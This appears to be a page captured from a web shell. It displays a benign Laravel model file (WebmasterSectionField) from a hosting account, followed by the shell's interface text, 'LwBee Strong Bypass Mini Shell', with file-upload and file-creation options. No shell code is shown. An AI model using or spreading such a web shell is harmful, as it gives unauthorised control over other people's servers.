/home/storage/f/3f/a5/aloic1/public_html/core/app/Models/WebmasterSectionField.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class WebmasterSectionField extends Model
{
    use HasFactory;

    public function fields()
    {
        return $this->hasMany('App\Models\TopicField', 'field_id')->orderby('id', 'asc');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File